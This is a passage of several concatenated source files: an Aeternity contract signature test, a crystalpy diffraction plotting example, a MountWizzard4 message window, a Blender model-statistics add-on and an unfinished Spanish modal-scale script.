    signature = ae_cli.delegate_name_claim_signature(account, contract_id, name)
    call, _ = contract_native.signedClaim(account.get_address(), name, salt, name_fee, signature)
    assert(call.return_type == 'ok')
    signature = ae_cli.delegate_name_transfer_signature(account, contract_id, name)
    call, _ = contract_native.signedTransfer(account.get_address(), bob.get_address(), name, signature)
    assert(call.return_type == 'ok')
    # after the transfer BOB owns the name, so BOB signs the revoke
    signature = ae_cli.delegate_name_revoke_signature(bob, contract_id, name)
    call, _ = contract_native.signedRevoke(bob.get_address(), name, signature)
    assert(call.return_type == 'ok')
contractOracles = """contract DelegateTest =
type fee = int
type ttl = Chain.ttl
type query_t = string
type answer_t = int
type oracle_id = oracle(query_t, answer_t)
type query_id = oracle_query(query_t, answer_t)
stateful payable entrypoint signedRegisterOracle(acct : address,
sign : signature,
qfee : fee,
ttl : ttl) : oracle_id =
Oracle.register(acct, qfee, ttl, signature = sign)
stateful payable entrypoint signedExtendOracle(o : oracle_id,
sign : signature, // Signed oracle address
ttl : ttl) : unit =
Oracle.extend(o, signature = sign, ttl)
datatype complexQuestion = Why(int) | How(string)
datatype complexAnswer = NoAnswer | Answer(complexQuestion, string, int)
stateful entrypoint signedComplexOracle(question, sig) =
let o = Oracle.register(signature = sig, Contract.address, 0, FixedTTL(1000)) : oracle(complexQuestion, complexAnswer)
let q = Oracle.query(o, question, 0, RelativeTTL(100), RelativeTTL(100))
Oracle.respond(o, q, Answer(question, "magic", 1337), signature = sig)
Oracle.get_answer(o, q)
"""
|
<filename>crystalpy/examples/main.py
import numpy as np
import matplotlib.pyplot as plt
from crystalpy.diffraction.DiffractionSetupSweeps import DiffractionSetupSweeps
from crystalpy.diffraction.Diffraction import Diffraction
from crystalpy.examples.Values import Values
from crystalpy.examples.PlotData1D import PlotData1D
from crystalpy.polarization.MuellerDiffraction import MuellerDiffraction
def intensity_phase_plot(plot_1d, values):
    """
    Plot the diffraction results: one column per polarization (S, P,
    difference), with intensity on the top row and phase on the bottom row.

    :param plot_1d: list of PlotData1D objects, ordered as produced by
        plot_diffraction_1d (indices 0-2 intensities, 3-5 phases).
    :param values: Values object providing the axis limits.
    """
    # Create subplots.
    f, ((ax1_intensity, ax2_intensity, ax3_intensity),
        (ax1_phase, ax2_phase, ax3_phase)) = plt.subplots(2, 3, sharex="all", sharey="row")

    angle_limits = [values.angle_deviation_min, values.angle_deviation_max]
    phase_limits = [values.phase_inf_limit, values.phase_sup_limit]

    def _fill_axis(ax, plot_data, fmt, y_limits):
        # Draw one curve and copy its titles and limits onto the axis.
        ax.plot(plot_data.x, plot_data.y, fmt)
        ax.set_title(plot_data.title)
        ax.set_xlabel(plot_data.title_x_axis)
        ax.set_ylabel(plot_data.title_y_axis)
        ax.set_xlim(angle_limits)
        ax.set_ylim(y_limits)

    # Column i pairs intensity plot i with phase plot i + 3.
    for index, ax in enumerate((ax1_intensity, ax2_intensity, ax3_intensity)):
        _fill_axis(ax, plot_1d[index], "b-", [0, 1])
    for index, ax in enumerate((ax1_phase, ax2_phase, ax3_phase)):
        _fill_axis(ax, plot_1d[index + 3], "g-.", phase_limits)
def hirano_plot(plot_1d, values):
    """
    Create a plot following the representation used in:
    K.Hirano et al., 'Perfect Crystal X-ray phase retarders' (1993).

    :param plot_1d: PlotData1D object.
    :param values: Values object.
    """
    fig, intensity_axis = plt.subplots(1, 1)
    angle_limits = [values.angle_deviation_min, values.angle_deviation_max]
    # Sigma and pi intensity curves share the left hand y axis.
    intensity_axis.plot(plot_1d[0].x, plot_1d[0].y, "b-", label="sigma intensity")
    intensity_axis.plot(plot_1d[1].x, plot_1d[1].y, "k--", label="pi intensity")
    plt.legend(loc="upper left")
    intensity_axis.set_title("Hirano plot")
    intensity_axis.set_xlabel(plot_1d[0].title_x_axis)
    intensity_axis.set_ylabel(plot_1d[0].title_y_axis)
    intensity_axis.set_xlim(angle_limits)
    # Phase retardation on a twin axis sharing x with the intensities.
    phase_axis = intensity_axis.twinx()
    phase_axis.set_xlim(angle_limits)
    phase_axis.set_ylim([values.phase_inf_limit, values.phase_sup_limit])
    phase_axis.plot(plot_1d[5].x, plot_1d[5].y, "g-.", label="phase retardation")
    phase_axis.set_ylabel(plot_1d[5].title_y_axis)
    plt.legend(loc="center left")
def stokes_plot(plot_1d, values):
    """
    Plot the Stokes parameters S0..S3 on a 2x2 grid of shared axes.

    :param plot_1d: list of PlotData1D objects; the first four entries are
        the Stokes parameter plots.
    :param values: Values object providing the angular limits.
    """
    # Create subplots.
    f, ((ax00, ax01), (ax10, ax11)) = plt.subplots(2, 2, sharex="all", sharey="all")
    # The repeated per-axis setup of the original is folded into one loop;
    # zip pairs each of the four axes with the first four plots.
    for ax, plot_data in zip((ax00, ax01, ax10, ax11), plot_1d):
        ax.plot(plot_data.x, plot_data.y, "-")
        ax.set_title(plot_data.title)
        ax.set_xlabel(plot_data.title_x_axis)
        ax.set_ylabel(plot_data.title_y_axis)
        ax.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
        ax.set_ylim([-1.0, 1.0])
def polarization_degree_plot(plot_1d, values):
    """
    Plot the degree of circular polarization (plot index 4).

    :param plot_1d: PlotData1D object.
    :param values: Values object.
    """
    fig, axis = plt.subplots(1, 1)
    degree_data = plot_1d[4]
    axis.plot(degree_data.x, degree_data.y, "b-")
    axis.set_title(degree_data.title)
    axis.set_xlabel(degree_data.title_x_axis)
    axis.set_ylabel(degree_data.title_y_axis)
    axis.set_xlim([values.angle_deviation_min, values.angle_deviation_max])
    axis.set_ylim([-1, 1])
def plot_diffraction_1d(result, deg):
    """
    Convert a diffraction result into a list of PlotData1D objects.

    For every energy six plots are appended, in this order: S intensity,
    P intensity, intensity difference, S phase, P phase, phase difference.

    :param result: diffraction result instance.
    :param deg: if False the phase is expressed in radians, if True in degrees.
    :return: list of PlotData1D objects.
    """
    # Distinguish between the strings "phase in deg" and "phase in rad".
    phase_string = "Phase in deg" if deg else "Phase in rad"
    # Retrieve setup information.
    info_dict = result.diffractionSetup().toDictionary()
    info_dict["Bragg angle"] = str(result.braggAngle())
    # Retrieve angles of the results.
    angles_in_um = [i * 1e+6 for i in result.angleDeviations()]

    # Define inner function to duplicate info for every plot.
    def addPlotInfo(info_dict, energy, angles_in_um, data):
        plot_data = PlotData1D(data[0], data[1], data[2])
        plot_data.set_x(angles_in_um)
        plot_data.set_y(data[3])
        for key, value in info_dict.items():
            plot_data.add_plot_info(key, value)
        plot_data.add_plot_info("Energy", str(energy))
        return plot_data

    plots = []
    # The unused "categories" accumulator of the original has been removed
    # and the six repeated blocks are folded into a spec list.
    for energy in result.energies():
        specs = [
            ("Intensity - Polarization S", "Intensity",
             result.sIntensityByEnergy(energy)),
            ("Intensity - Polarization P", "Intensity",
             result.pIntensityByEnergy(energy)),
            ("Intensity difference", "Intensity",
             result.differenceIntensityByEnergy(energy)),
            ("Phase - Polarization S", phase_string,
             result.sPhaseByEnergy(energy, deg)),
            ("Phase - Polarization P", phase_string,
             result.pPhaseByEnergy(energy, deg)),
            ("Phase difference", phase_string,
             result.differencePhaseByEnergy(energy, deg)),
        ]
        for title, y_label, data in specs:
            plots.append(addPlotInfo(info_dict, energy, angles_in_um,
                                     (title, "Angle deviation in urad", y_label, data)))
    return plots
def plot_stokes_1d(result):
    """
    Convert a Mueller result into a list of PlotData1D objects.

    For every energy five plots are appended: the Stokes parameters S0..S3
    followed by the degree of circular polarization.

    :param result: Mueller result instance.
    :return: list of PlotData1D objects.
    """
    # Retrieve setup information.
    info_dict = result.diffraction_setup.toDictionary()
    info_dict["Bragg angle"] = str(result.diffraction_result.braggAngle())
    # Retrieve angles of the results.
    angles_in_urad = [i * 1e+6 for i in result.angle_deviations()]

    # Define inner function to duplicate info for every plot.
    def add_all_plot_info(info_dict, energy, angles_in_urad, data):
        plot_data = PlotData1D(data[0], data[1], data[2])
        plot_data.set_x(angles_in_urad)
        plot_data.set_y(data[3])
        for key, value in info_dict.items():
            plot_data.add_plot_info(key, value)
        plot_data.add_plot_info("Energy", str(energy))
        return plot_data

    plots = list()
    for energy in result.energies():
        # (title, y label, data) for the five plots of this energy.
        specs = [
            ("Stokes parameter S0", "S0", result.s0_by_energy(energy)),
            ("Stokes parameter S1", "S1", result.s1_by_energy(energy)),
            ("Stokes parameter S2", "S2", result.s2_by_energy(energy)),
            ("Stokes parameter S3", "S3", result.s3_by_energy(energy)),
            ("Degree of circular polarization", "Circular polarization",
             result.polarization_degree_by_energy(energy)),
        ]
        for title, y_label, data in specs:
            plots.append(add_all_plot_info(info_dict, energy, angles_in_urad,
                                           (title, "Angle deviation in urad", y_label, data)))
    return plots
if __name__ == "__main__":
    # Get values from user or use default values.
    values = Values()
    values.print()

    # Create a diffraction setup.
    # At this stage I translate angles in radians, energy in eV and all other values in SI units.
    print("\nCreating a diffraction setup...")
    diffraction_setup = DiffractionSetupSweeps(geometry_type=values.geometry_type,  # GeometryType object
                                               crystal_name=values.crystal_name,  # string
                                               thickness=float(values.thickness) * 1e-2,  # meters
                                               miller_h=int(values.miller_h),  # int
                                               miller_k=int(values.miller_k),  # int
                                               miller_l=int(values.miller_l),  # int
                                               asymmetry_angle=float(values.asymmetry_angle) / 180 * np.pi,  # radians
                                               azimuthal_angle=float(values.azimuthal_angle) / 180 * np.pi,  # radians
                                               energy_min=float(values.energy_min) * 1e3,  # eV
                                               energy_max=float(values.energy_max) * 1e3,  # eV
                                               energy_points=int(values.energy_points),  # int
                                               angle_deviation_min=float(values.angle_deviation_min) * 1e-6,  # radians
                                               angle_deviation_max=float(values.angle_deviation_max) * 1e-6,  # radians
                                               angle_deviation_points=int(values.angle_deviation_points))  # int
    # Create a Diffraction object.
    diffraction = Diffraction()
    # Create a DiffractionResult object holding the results of the diffraction calculations.
    print("\nCalculating the diffraction results...")
    diffraction_result = diffraction.calculateDiffraction(diffraction_setup)
    # Create a PlotData1D object.
    print("\nCreating the diffraction profile plots...")
    plot_1d = plot_diffraction_1d(diffraction_result, values.deg)
    # NOTE(review): the phase unwrapping branch below is permanently disabled
    # with "if False:"; flip to True (or make it configurable) to enable it.
    if False:
        # Unwrap the phases.
        print("\nUnwrapping the phase data...")
        phase_limits = (values.phase_inf_limit, values.phase_sup_limit)
        plot_1d[3].smart_unwrap(values.intervals, values.intervals_number, phase_limits, values.deg)
        plot_1d[4].smart_unwrap(values.intervals, values.intervals_number, phase_limits, values.deg)
        plot_1d[5].smart_unwrap(values.intervals, values.intervals_number, phase_limits, values.deg)
    # Plot the diffraction results.
    intensity_phase_plot(plot_1d, values)
    # Create a plot following the representation used in:
    # K.Hirano et al., 'Perfect Crystal X-ray phase retarders' (1993).
    hirano_plot(plot_1d, values)
    # Create a MuellerDiffraction object.
    mueller_diffraction = MuellerDiffraction(diffraction_result,
                                             values.incoming_stokes_vector,
                                             values.inclination_angle*np.pi/180.0)
    # Create a MullerResult object.
    print("\nCalculating the Stokes vector...")
    mueller_result = mueller_diffraction.calculate_stokes()
    # Create a PlotData1D object.
    print("\nCreating the Stokes parameters plots...")
    plot_1d = plot_stokes_1d(mueller_result)
    # Plot the Stokes vectors.
    stokes_plot(plot_1d, values)
    # Plot the degree of circular polarization.
    polarization_degree_plot(plot_1d, values)
    plt.show()
|
<reponame>Raddock/MountWizzard4<filename>mw4/gui/messageW.py
############################################################
# -*- coding: utf-8 -*-
#
# # # # # # #
# ## ## # ## # #
# # # # # # # # # # #
# # ## # ## ## ######
# # # # # # #
#
# Python-based Tool for interaction with the 10micron mounts
# GUI with PyQT5 for python
# Python v3.7.5
#
# <NAME>
# (c) 2019
#
# Licence APL2.0
#
###########################################################
# standard libraries
import logging
import time
import json
import pkg_resources
# external packages
import PyQt5.QtCore
import PyQt5.QtWidgets
import PyQt5.uic
# local import
import mw4
from mw4.gui import widget
from mw4.gui.widgets import message_ui
from indibase import qtIndiBase
class MessageWindow(widget.MWidget):
    """
    The message window displays all messages emitted through app.message in
    a text browser, color and font weight coded by message type.
    """

    __all__ = ['MessageWindow',
               ]
    logger = logging.getLogger(__name__)

    def __init__(self, app):
        super().__init__()
        self.app = app
        self.ui = message_ui.Ui_MessageDialog()
        self.ui.setupUi(self)
        self.initUI()
        # color / font weight per message type 0..3, indexed by writeMessage
        self.messColor = [self.COLOR_ASTRO,
                          self.COLOR_WHITE,
                          self.COLOR_YELLOW,
                          self.COLOR_RED,
                          ]
        self.messFont = [PyQt5.QtGui.QFont.Normal,
                         PyQt5.QtGui.QFont.Bold,
                         PyQt5.QtGui.QFont.Normal,
                         PyQt5.QtGui.QFont.Normal,
                         ]
        self.initConfig()
        self.showWindow()

    def initConfig(self):
        """
        initConfig read the key out of the configuration dict and stores it to the gui
        elements. if some initialisations have to be proceeded with the loaded persistent
        data, they will be launched as well in this method.

        :return: True for test purpose
        """
        if 'messageW' not in self.app.config:
            self.app.config['messageW'] = {}
        config = self.app.config['messageW']
        x = config.get('winPosX', 100)
        y = config.get('winPosY', 100)
        # keep the window on screen when the stored position is off screen
        if x > self.screenSizeX:
            x = 0
        if y > self.screenSizeY:
            y = 0
        self.move(x, y)
        height = config.get('height', 600)
        self.resize(800, height)
        return True

    def storeConfig(self):
        """
        storeConfig writes the keys to the configuration dict and stores. if some
        saving has to be proceeded to persistent data, they will be launched as
        well in this method.

        :return: True for test purpose
        """
        if 'messageW' not in self.app.config:
            self.app.config['messageW'] = {}
        config = self.app.config['messageW']
        config['winPosX'] = self.pos().x()
        config['winPosY'] = self.pos().y()
        config['height'] = self.height()
        return True

    def closeEvent(self, closeEvent):
        """
        Persist the window geometry and disconnect the gui signals before
        handing the event to the base class.
        """
        self.storeConfig()

        # gui signals
        self.ui.clear.clicked.disconnect(self.clearWindow)
        self.app.message.disconnect(self.writeMessage)

        super().closeEvent(closeEvent)

    def showWindow(self):
        """
        Show the window, write the startup messages and connect the gui
        signals.
        """
        self.show()

        # write basic data to message window
        profile = self.app.config.get('profileName', '-')
        self.writeMessage('MountWizzard4 started', 1)
        self.writeMessage(f'Workdir is: [{self.app.mwGlob["workDir"]}]', 1)
        self.writeMessage(f'Profile [{profile}] loaded', 0)

        # gui signals
        self.ui.clear.clicked.connect(self.clearWindow)
        self.app.message.connect(self.writeMessage)

    def clearWindow(self):
        """
        clearWindow resets the window and shows empty text.

        :return: true for test purpose
        """
        self.ui.message.clear()
        return True

    def writeMessage(self, message, mType=0):
        """
        writeMessage takes signals with message and writes them to the text browser window.
        types:
            0: normal text
            1: highlighted text
            2: warning text
            3: error text

        :param message: message text
        :param mType: message type
        :return: True when the message was written, False for invalid types
        """
        if mType < 0:
            return False
        # Bug fix: the original compared with '>', which let
        # mType == len(self.messColor) through and raised an IndexError on
        # the list lookups below; '>=' rejects the out-of-range index.
        if mType >= len(self.messColor):
            return False

        prefix = time.strftime('%H:%M:%S ', time.localtime())
        message = prefix + message
        self.logger.info('Message window: [{0}]'.format(message))
        self.ui.message.setTextColor(self.messColor[mType])
        self.ui.message.setFontWeight(self.messFont[mType])
        self.ui.message.insertPlainText(message + '\n')
        self.ui.message.moveCursor(PyQt5.QtGui.QTextCursor.End)
        return True
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# Copyright (C) 2020 Wheatfield Media INC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import os
# 'Operator' was imported twice in the original bpy.types line.
from bpy.types import Operator, Panel, PropertyGroup
from bpy.props import BoolProperty, FloatProperty, IntProperty
import bmesh
from ..core import common
from ..core.total_operator import CheckModelTool as CheckModel

# True on Blender 2.80+, where the sidebar region is named "UI" ("TOOLS" before).
blender_version = bool(bpy.app.version >= (2, 80, 0))
class VIEW3D_PT_Check_Model_UI(Panel):
    """Sidebar panel showing the model statistics gathered by CheckModel.

    The numbers come from ``scene.total_lst`` (index 0 holds the per-scene
    totals), which is refreshed by MESH_OT_CheckModel_UpData.
    """
    bl_label = "Object statistics"
    bl_idname = "VIEW3D_PT_Check_Model_UI"
    bl_space_type = "VIEW_3D"
    # Blender 2.80+ renamed the sidebar region from "TOOLS" to "UI".
    bl_region_type = "UI" if blender_version else "TOOLS"
    bl_category = "Object statistics"

    def draw(self,context):
        """Draw one collapsible box of counters per check category."""
        scene = context.scene
        check = scene.ui_prop      # UI toggles/thresholds (Check_Scene_Props)
        updata = scene.total_lst   # cached check results; [0] = scene totals
        layout = self.layout
        col = layout.column(align=False)
        col.prop(check,"boolBox")
        row = col.row(align=True)
        row.operator(MESH_OT_CheckModel_UpData.bl_idname,text="Refresh",icon="FILE_REFRESH")
        row.operator(MESH_OT_ShowInfo_UpData.bl_idname,text="Details",icon="INFO")
        # Row labels; index i below selects both the label and updata[0][i].
        label_str = [
            "Total Count: ",
            "Geometries: ",
            "Polygons:",
            "Vertices:",
            "Objects with Isolated Vertices:",
            "Isolated Vertices:",
            "Objects with Isolated Edge:",
            "Isolated Edge:",
            "Objects with Isolated Face:",
            "Isolated Face:",
            "Objects with Overlapping Vertices:",
            "Overlapping Vertices:",
            "Objects with NGons:",
            "NGons:",
            "Objects with Overlapping UV Polygons:",
            "Overlapping UV Polygons:",
            "Overflowing UV Area:",
            "Textures:",
            "Missing Textures:",
            "Objects with Missing Textures:",
        ]
        # One box per category; each box is greyed out when its toggle is off.
        col.prop(check,"boolBox_ob")
        box1 = col.box().grid_flow(align=True,row_major=True,columns=2)
        box1.enabled = check.boolBox_ob
        col.prop(check,"boolBox_loose")
        box2 = col.box().grid_flow(align=True,row_major=True,columns=2)
        box2.enabled = check.boolBox_loose
        col.prop(check,"boolBox_mutl")
        box3 = col.box().grid_flow(align=True,row_major=True,columns=3)
        box3.enabled = check.boolBox_mutl
        col.prop(check,"boolBox_NGons")
        box4 = col.box().grid_flow(align=True,row_major=True,columns=2)
        box4.enabled = check.boolBox_NGons
        col.prop(check,"boolBox_uv")
        box5 = col.box().grid_flow(align=True,row_major=True,columns=3)
        box5.enabled = check.boolBox_uv
        col.prop(check,"boolBox_img")
        box6 = col.box().grid_flow(align=True,row_major=True,columns=3)
        box6.enabled = check.boolBox_img
        # Route each counter row into its category box by index range.
        for i in range(len(label_str)):
            if i in [0,1,2,3]:
                row = box1.row(align=True).box().row(align=True)
                row.label(text=label_str[i])
                row.label(text=str(updata[0][i]))
            elif i in [4,5,6,7,8,9]:
                row = box2.row(align=True).box().row(align=True)
                row.label(text=label_str[i])
                row.label(text=str(updata[0][i]))
            elif i in [10,11]:
                row = box3.row(align=True).box().row(align=True)
                row.label(text=label_str[i])
                row.label(text=str(updata[0][i]))
                # last overlap row also exposes the distance threshold
                if i == 11:
                    row.prop(check,"threshold_value",text="Threshold")
            elif i in [12,13]:
                row = box4.row(align=True).box().row(align=True)
                row.label(text=label_str[i])
                row.label(text=str(updata[0][i]))
                '''----Start with here'''
                # last n-gon row also exposes the edge-count setting; taken
                # from scene.check when its own ngons toggle is active
                if i == 13:
                    check_mesh = scene.check
                    if check_mesh.ngons:
                        row.prop(check_mesh,"ngons_verts_count",text="Edge Number")
                    else:
                        row.prop(check,"ngons_count",text="Edge Number")
            elif i in [14,15,16]:
                row = box5.row(align=True).box().row(align=True)
                row.label(text=label_str[i])
                row.label(text=str(updata[0][i]))
            elif i in [17,18,19]:
                row = box6.row(align=True).box().row(align=True)
                row.label(text=label_str[i])
                row.label(text=str(updata[0][i]))
class MESH_OT_CheckModel_UpData(Operator):
    """Operator: re-run the model checks and cache results in scene.total_lst."""
    bl_idname="check_model.updata"
    bl_label = "check_model_updata"

    def execute(self,context):
        """Run CheckModel with the toggles chosen in the UI.

        Clears the previous results first, then appends the fresh rows to
        ``scene.total_lst``.
        """
        scene = context.scene
        check = scene.ui_prop
        # the check helpers expect object mode with nothing selected
        if bpy.context.mode != "OBJECT":
            bpy.ops.object.mode_set(mode='OBJECT')
        bpy.ops.object.select_all(action='DESELECT')
        bpy.context.scene.total_lst.clear()
        sc_obs_total = CheckModel().init(mutl_ver_dist=check.threshold_value,
                                         open_ob=check.boolBox_ob,
                                         open_loose=check.boolBox_loose,
                                         open_mutl=check.boolBox_mutl,
                                         open_gnons=check.boolBox_NGons,
                                         open_uv=check.boolBox_uv,
                                         open_img=check.boolBox_img)
        for i in sc_obs_total:
            bpy.context.scene.total_lst.append(i)
        bpy.ops.object.select_all(action='DESELECT')
        return {"FINISHED"}
class MESH_OT_ShowInfo_UpData(Operator):
    """Popup dialog listing per-object check results as a wide table."""
    bl_idname="show_info.updata"
    bl_label = "ShowInfo"

    def invoke(self, context, event):
        # open as a wide props dialog instead of executing directly
        wm = context.window_manager
        return wm.invoke_props_dialog(self, width=1100)

    def draw(self,context):
        """Draw the header row followed by one row per checked object."""
        scene = context.scene
        check = scene.ui_prop
        updata = scene.total_lst
        layout = self.layout
        col = layout.column(align=True)
        tab_head = [
            "Object Name",
            "Object Location",
            "Object Rotation",
            "Object Scale",
            "Isolated Vertices",
            "Isolated Edges",
            "Isolated Faces",
            "Overlapping Vertices",
            "NGons",
            "Overlapping UV Polygons",
            "UV Area",
            "UV Overflow",
            "Missing Textures",
        ]
        row = col.row(align=True)
        for i in tab_head:
            box = row.box()
            # the name column gets most of the horizontal space
            if i == "Object Name":
                box.label(text=i)
                box.scale_x = 450
            else:
                box.scale_x = 10
                box.label(text=i)
        check_data = []
        # boolBox = "Display Errors Only": updata[2] presumably holds the
        # errors-only rows, updata[1] all rows — confirm against CheckModel
        if check.boolBox:
            check_data = updata[2]
        else:
            check_data = updata[1]
        col = col.column(align=True)
        for item in check_data:
            row = col.row(align=True)
            for j in range(len(item)):
                box = row.box()
                if j == 0:
                    box.label(text=str(item[j]))
                    box.scale_x = 450
                else:
                    box.scale_x = 10
                    box.label(text=str(item[j]))

    def execute(self,context):
        # display-only dialog; nothing to apply
        return {"FINISHED"}
class Check_Scene_Props(PropertyGroup):
    """Scene-level settings controlling which checks run and their thresholds."""
    # show only rows that contain errors in the details dialog
    boolBox : BoolProperty(name="Display Errors Only", default=True)
    # distance under which two vertices count as overlapping
    threshold_value: FloatProperty(name="",description="Threshold",subtype="DISTANCE",default=0.0001,min=0.00001,max=10)
    boolBox_ob: BoolProperty(name="Object:",default=True,description="Count objects")
    boolBox_loose : BoolProperty(name="Isolated Elements:",default=True,description="Count the isolated elements")
    boolBox_mutl: BoolProperty(name="Overlapping Vertices:",default=True,description="Count doubles of geometry")
    boolBox_NGons: BoolProperty(name="NGons:",default=True,description="Count the N-gons of geometry")
    boolBox_uv: BoolProperty(name="UV:",default=False,description="Heavy calculations. Off by default.")
    boolBox_img: BoolProperty(name="Images:",default=True,description="Images count")
    '''---Modify--Polygon Edge Count'''
    # minimum edge count for a polygon to be reported as an n-gon
    ngons_count: IntProperty(name="Polygon Edge Count",description="Polygon Edge Count",default = 5,min = 5)
#!/usr/bin/python
# -*- coding: utf-8 -*-
#import stdin
#import argparse
import re
"""
Script para determinar las posibles tonalidades a partir de las notas insertadas
Las notas se puede insertar del siguiente modo:
C
Cmaj7
Cmin7
Csus
C#
Por ahora, no se soporta poner "b". Cualquier bemol debe meterse como "#"
"""
def modo_jonico(nota):
    """Return the Ionian (mode I) scale built on the root of *nota*.

    *nota* may be a bare root ('C', 'F#') or carry a quality suffix
    ('Cmaj7', 'Cmin7', 'Csus'); anything else raises ValueError.
    Returns eight 'note+quality' strings, with the tonic repeated at the
    octave.
    """
    # Ionian steps in semitones: 1 - 1 - 1/2 - 1 - 1 - 1 - 1/2
    cadencia = (2, 2, 1, 2, 2, 2, 1)
    tonos = ('maj7', 'min7', 'min7', 'maj7', 'dom', 'min7', 'semi', 'maj7')
    abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
    # Accept any supported quality suffix, not only maj7/min7: the original
    # replace() chain made 'Csus' raise even though the module docstring
    # allows it.  're' is already imported at module level.
    raiz = re.match(r'([A-G]#?)(?:maj7|min7|sus)?$', nota)
    if raiz is None:
        raise ValueError('unsupported note spelling: %r' % (nota,))
    base = abanico_notas.index(raiz.group(1))
    tono = [abanico_notas[base] + tonos[0]]
    for index, paso in enumerate(cadencia, 1):
        base = (base + paso) % len(abanico_notas)
        tono.append(abanico_notas[base] + tonos[index])
    return tono
def modo_dorico(nota):
    """Return the Dorian (mode II) scale built on the root of *nota*.

    *nota* may be a bare root or carry a quality suffix ('Cmin7', 'Csus');
    anything else raises ValueError.  Returns eight 'note+quality' strings.
    """
    # Dorian steps in semitones: 1 - 1/2 - 1 - 1 - 1 - 1/2 - 1
    cadencia = (2, 1, 2, 2, 2, 1, 2)
    tonos = ('min7', 'semi', 'maj7', 'min7', 'min7', 'maj7', 'dom', 'min7')
    abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
    # Strip any supported quality suffix down to the root (the original only
    # handled maj7/min7 and raised on 'Csus').
    raiz = re.match(r'([A-G]#?)(?:maj7|min7|sus)?$', nota)
    if raiz is None:
        raise ValueError('unsupported note spelling: %r' % (nota,))
    base = abanico_notas.index(raiz.group(1))
    tono = [abanico_notas[base] + tonos[0]]
    for index, paso in enumerate(cadencia, 1):
        base = (base + paso) % len(abanico_notas)
        tono.append(abanico_notas[base] + tonos[index])
    return tono
def modo_frigio(nota):
    """Return the Phrygian (mode III) scale built on the root of *nota*.

    *nota* may be a bare root or carry a quality suffix; anything else
    raises ValueError.  Returns eight 'note+quality' strings.
    """
    # Phrygian steps in semitones: 1/2 - 1 - 1 - 1 - 1/2 - 1 - 1
    cadencia = (1, 2, 2, 2, 1, 2, 2)
    tonos = ('min7', 'maj7', 'dom', 'min7', 'dism', 'maj7', 'min7', 'min7')
    abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
    # Strip any supported quality suffix down to the root (the original only
    # handled maj7/min7 and raised on 'Csus').
    raiz = re.match(r'([A-G]#?)(?:maj7|min7|sus)?$', nota)
    if raiz is None:
        raise ValueError('unsupported note spelling: %r' % (nota,))
    base = abanico_notas.index(raiz.group(1))
    tono = [abanico_notas[base] + tonos[0]]
    for index, paso in enumerate(cadencia, 1):
        base = (base + paso) % len(abanico_notas)
        tono.append(abanico_notas[base] + tonos[index])
    return tono
def modo_lidio(nota):
    """Return the Lydian (mode IV) scale built on the root of *nota*.

    *nota* may be a bare root or carry a quality suffix; anything else
    raises ValueError.  Returns eight 'note+quality' strings.
    """
    # Lydian steps in semitones: 1 - 1 - 1 - 1/2 - 1 - 1 - 1/2
    cadencia = (2, 2, 2, 1, 2, 2, 1)
    tonos = ('maj7', 'dom', 'min7', 'dism', 'maj7', 'min7', 'min7', 'maj7')
    abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
    # Strip any supported quality suffix down to the root (the original only
    # handled maj7/min7 and raised on 'Csus').
    raiz = re.match(r'([A-G]#?)(?:maj7|min7|sus)?$', nota)
    if raiz is None:
        raise ValueError('unsupported note spelling: %r' % (nota,))
    base = abanico_notas.index(raiz.group(1))
    tono = [abanico_notas[base] + tonos[0]]
    for index, paso in enumerate(cadencia, 1):
        base = (base + paso) % len(abanico_notas)
        tono.append(abanico_notas[base] + tonos[index])
    return tono
def modo_mixolidio(nota):
    """Return the Mixolydian (mode V) scale built on the root of *nota*.

    *nota* may be a bare root or carry a quality suffix; anything else
    raises ValueError.  Returns eight 'note+quality' strings.
    """
    # Mixolydian steps in semitones: 1 - 1 - 1/2 - 1 - 1 - 1/2 - 1
    cadencia = (2, 2, 1, 2, 2, 1, 2)
    tonos = ('dom', 'min7', 'dism', 'maj7', 'min7', 'min7', 'maj7', 'dom')
    abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
    # Strip any supported quality suffix down to the root (the original only
    # handled maj7/min7 and raised on 'Csus').
    raiz = re.match(r'([A-G]#?)(?:maj7|min7|sus)?$', nota)
    if raiz is None:
        raise ValueError('unsupported note spelling: %r' % (nota,))
    base = abanico_notas.index(raiz.group(1))
    tono = [abanico_notas[base] + tonos[0]]
    for index, paso in enumerate(cadencia, 1):
        base = (base + paso) % len(abanico_notas)
        tono.append(abanico_notas[base] + tonos[index])
    return tono
def modo_eolico(nota):
    """Return the Aeolian (mode VI, natural minor) scale on the root of *nota*.

    *nota* may be a bare root or carry a quality suffix; anything else
    raises ValueError.  Returns eight 'note+quality' strings.
    """
    # Aeolian steps in semitones: 1 - 1/2 - 1 - 1 - 1/2 - 1 - 1
    cadencia = (2, 1, 2, 2, 1, 2, 2)
    tonos = ('min7', 'dism', 'maj7', 'min7', 'min7', 'maj7', 'dom', 'min7')
    abanico_notas = ('C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B')
    # Strip any supported quality suffix down to the root (the original only
    # handled maj7/min7 and raised on 'Csus').
    raiz = re.match(r'([A-G]#?)(?:maj7|min7|sus)?$', nota)
    if raiz is None:
        raise ValueError('unsupported note spelling: %r' % (nota,))
    base = abanico_notas.index(raiz.group(1))
    tono = [abanico_notas[base] + tonos[0]]
    for index, paso in enumerate(cadencia, 1):
        base = (base + paso) % len(abanico_notas)
        tono.append(abanico_notas[base] + tonos[index])
    return tono
def modo_locria(nota):
    """Return the Locrian (mode VII) scale built on the root of *nota*.

